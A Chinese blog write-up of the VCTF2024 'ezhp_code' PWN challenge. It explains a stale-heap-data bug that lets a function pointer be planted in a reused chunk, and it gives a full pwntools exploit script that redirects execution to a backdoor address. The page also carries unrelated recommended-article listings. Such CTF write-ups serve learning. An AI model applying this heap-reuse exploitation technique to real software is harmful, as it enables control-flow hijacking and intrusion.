[VCTF2024纳新赛]-PWN:ezhp_code解析

最新推荐文章于 2024-07-08 03:28:55 发布
最新推荐文章于 2024-07-08 03:28:55 发布
阅读量276 收藏 1
点赞数 2
分类专栏: PWN 文章标签: python 前端 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79326813/article/details/136789367
版权

查看保护

查看ida

简单来说就是创建堆块和删除堆块而已,创建堆块的函数附带有写入函数。

但这里要注意一个程序里面的特殊的地方

在我们创建堆块时,程序会先创建一个0xa0大小堆块,并且这个地方还有个特殊的check_handle函数,如果在这个堆块地址+40的地方如果有函数地址,就会跳转执行。

并且创建堆块使用的时malloc,释放堆块也并没有清空堆块内容,所以我们可以加以利用。

完整exp:

from pwn import*
context(log_level='debug')
p=process('./heapcode')
backdoor=0x4012A5

def alloc(size,content):
    p.sendlineafter(b'3.exit',b'1')
    p.sendlineafter(b'Input your name:',b'aa')
    p.sendlineafter(b'The length you want to say:',str(size))
    p.sendlineafter(b'You say:',content)
def free():
    p.sendlineafter(b'3.exit',b'2')

alloc(0x90//2,p64(0)*5+p64(backdoor))
free()
alloc(0x10,p64(0))
p.sendlineafter(b'3.exit',b'1')
p.interactive()

clxhzg
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
欧姆龙PLC可编程控制器CPM2C-S1□0C-DRT.pdf
09-18
连接支持VCTF、简单分支的扁平电缆。RS-232C通信,可连接BCR、PT等,在从站侧处理数据可减轻主站的负担。扩展单元(最大3个单元)。在分支块中可通过1节点实现。多点时,会因减少了通信部而降低成本。
欧姆龙小型限位开关 D4C.pdf
09-25
欧姆龙小型限位开关 D4Cpdf,欧姆龙小型限位开关 D4C:超小·超薄·高度密封性的小型限位开关,已通过EN(TüV)、UL、CSA、CCC规格认证。...)VCTF耐油软线型及预制线型为CE标记对应产品。(但仅适用于标准型)
Java基础:爬虫
weixin_65752158的博客
07-04 1002
Pattern:表示正则表达式Matcher:文本匹配器,作用按照正则表达式的规则去读取字符串,从头开始读取。在大串中去找符合匹配规则的子串。通过Pattern p = Pattern.compile("正则表达式");获得 通过Matcher m = p.matcher(str);获得 (m要在str中找符合p规则的小串)其中, m为Matcher对象, p为正则表达式规则, str为要验证的字符串. boolean b = m.find(); 表示拿着文本匹配器从头开始读取,寻找是否有
pandas,dataframe使用笔记
分享计算机视觉,C++,嵌入式等知识。
07-05 470
dataframe属于pandas。
Python28-7.3 降维算法之多维缩放MDS
Argulo的博客
07-05 649
多维尺度分析(Multidimensional Scaling, MDS)是一种用于降维的统计技术,其目标是将高维数据嵌入到低维空间中,同时尽量保持原始数据中点与点之间的距离关系。MDS 的目标是将高维数据中的点嵌入到低维(通常是二维或三维)空间中,使得在低维空间中点之间的距离尽量接近原始高维空间中点之间的距离。这通过最小化一个损失函数(通常是应力函数)来实现,应力函数衡量的是原始距离和降维后距离之间的不一致性。:对原始数据中的距离或相似度进行非度量变换,以保留原始数据中的顺序信息,而不是精确的距离值。
已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法,亲测有效!!!
小明的Java问道之路
07-08 936
已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法,亲测有效!!!
Django学习第四天
qq_43580271的博客
07-04 466
UserEditModelForm类继承了BootStrapModelForm类的方法,BootStrapModelForm继承了forms.ModelForm的方法所以使用继承能够更好封装代码功能。ModelForm引入时间样式(自动生成了id为id_create_time)django自动帮我们把session功能定义好了,使用只需要这样一个语句。封装每部分的功能,拆分到每个模块中去。在html中增加属性的方法1。在html中增加属性的方法2。在html中增加属性的方法3。在用户列表页面使用分页功能。
day04-matplotlib入门
m0_57852920的博客
07-05 947
Matplotlib 提供了一个套面向绘图对象编程的 API接口实列:绘制x轴为-50-50,y轴为x轴的平方的直方图。
Python进阶】函数的扩展
weixin_52854743的博客
07-06 950
python函数的补充,包括函数的嵌套调用、函数的变量作用域、多种参数、拆包和交换变量值、引用和匿名函数
Python创建MySQL数据库
limengshi138392的博客
07-05 365
Python创建MySQL数据库
python拆分Excel数据,自动发邮箱
cc605523的博客
07-06 616
message['To'] = ",".join(recipient_email) # 收件人(可以添加多个,若只有一个收件人,可直接写邮箱号)"采购部": ['young@realstarie.com', "865193996@qq.com"], # 可以添加多个收件人。# split_Excel("年假情况.xlsx", "年假_按部门汇总")department_df = df[df["部门"] == dept]depts = ["采购部", "船务部"]
并发编程面试题1
搬砖的小熊猫的博客
07-03 961
单例模式中的懒汉机制会有有序性问题。DCL(Double-Checked Locking)方式存在指令重排问题,可能导致NullPointerException。在Java编译时,JIT会优化指令顺序,提升执行效率。在CPU层面,也会对指令进行重新排序,提升执行效率。这种指令调整在特殊操作上可能会导致问题。
守望数据边界:sklearn中的离群点检测技术
最新发布
2401_85742452的博客
07-08 554
本文的目的是帮助读者更好地理解离群点检测,并掌握在sklearn中实现这些技术的方法。通过本文,我们了解到了sklearn中不同的离群点检测技术,并提供了实际的代码示例。Isolation Forest是一种基于随机森林的离群点检测方法,它通过随机选择特征和切分点来“孤立”离群点。在实际应用中,离群点检测可以帮助我们识别数据集中的异常行为,从而进行进一步的分析或采取预防措施。评估离群点检测的效果通常比较困难,因为没有绝对的标准。基于密度的方法,如DBSCAN,根据数据点的密度而非固定阈值来识别离群点。
如何使用uer做多分类任务
weixin_62115482的博客
07-06 338
这里可以看到只有61.49的正确率,其实是因为显存还不够,训练不了那么大的,标准的参数应该设置为batch_size=32 seq_length=256。接着呢要把所有tsv文件的sentence表头名改成text_a,不然运行uer框架会报错,原因请看源代码逻辑。这里规定好了表头名只有label,text_a,text_b。搞完之后进入训练代码,我的显存只有16G,因此。因此我们对此要做一些处理,将其转为tsv格式。有能力的可以更改参数进行训练。里面是这有json文件的。最后自行查看预测效果。
Python Tkinter手搓俄罗斯方块
甜盐的博客
07-03 564
俄罗斯方块是一个经典的电子游戏,风靡全球。下面我们一步一步地使用Python和Tkinter库制作一个简易的俄罗斯方块游戏。
每日一道算法题 彩灯装饰记录 I
weixin_65816128的博客
07-05 315
【代码】每日一道算法题 彩灯装饰记录 I。
【开发环境】MacBook M系列芯片环境下搭建完整Python开发环境
Zhangsama1的博客
07-02 639
总的来说,如果你的工作或学习需要涉及到大量的数据处理和科学计算,使用 Anaconda 是一个非常好的选择,因为它简化了许多复杂的安装和配置过程。如果你只是需要 Python 本身,并且希望保持环境的简洁,那么单独安装 Python 可能是更好的选择。就可以再红色箭头的位置选择你要使用的Anaconda环境,从而达到不同的开发环境的隔离。所以,按照现在的情况,直接用Anaconda就好了,虽然大一点,但是绝对方便。然后你可以再Anaconda中安装对应的python包,并且创建你自己的环境。
python安装或升级模块时,[WinError 5] 拒绝访问
计算机辅助工程
07-04 442
在命令行中输入 pip install 来安装 或者 pip install --upgrade 来更新。基本上遇到 Consider using the --user option…就是需要管理员权限才能安装或更新。安装:pip install --user # 这里的 --user 照打就行了,别用自己的用户名。更新:pip install --upgrade --user。可以通过管理员的身份进行安装和更新。右键,选择以管理员身份运行。
如何使用Pip从Git仓库安装Python包:深入探索远程依赖管理
2401_85342379的博客
07-05 552
Python的包管理工具Pip使得安装和管理Python库变得非常简单。有时,我们需要安装那些尚未发布到PyPI的包,或者想要尝试最新的开发版本。这时,可以直接从Git仓库安装包。本文将详细介绍如何使用Pip从Git仓库安装Python包,并提供详细的代码示例。
Java巅峰之路---基础篇---方法
2301_76909842的博客
07-07 887
方法(method)是程序中最小的执行单元定义格式:public static void 方法名(){方法体(就是打包起来的代码);调用格式:方法名();定义格式:public static void 方法名(参数1,参数2,...){...}调用格式:方法名(参数1,参数2,...);注意:方法调用时,形参必须与实参一一对应(数量与类型),否则程序会报错定义格式:返回值类型方法名(参数){//参数有无看自己需求方法体(就是打包起来的代码);return 返回值;

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值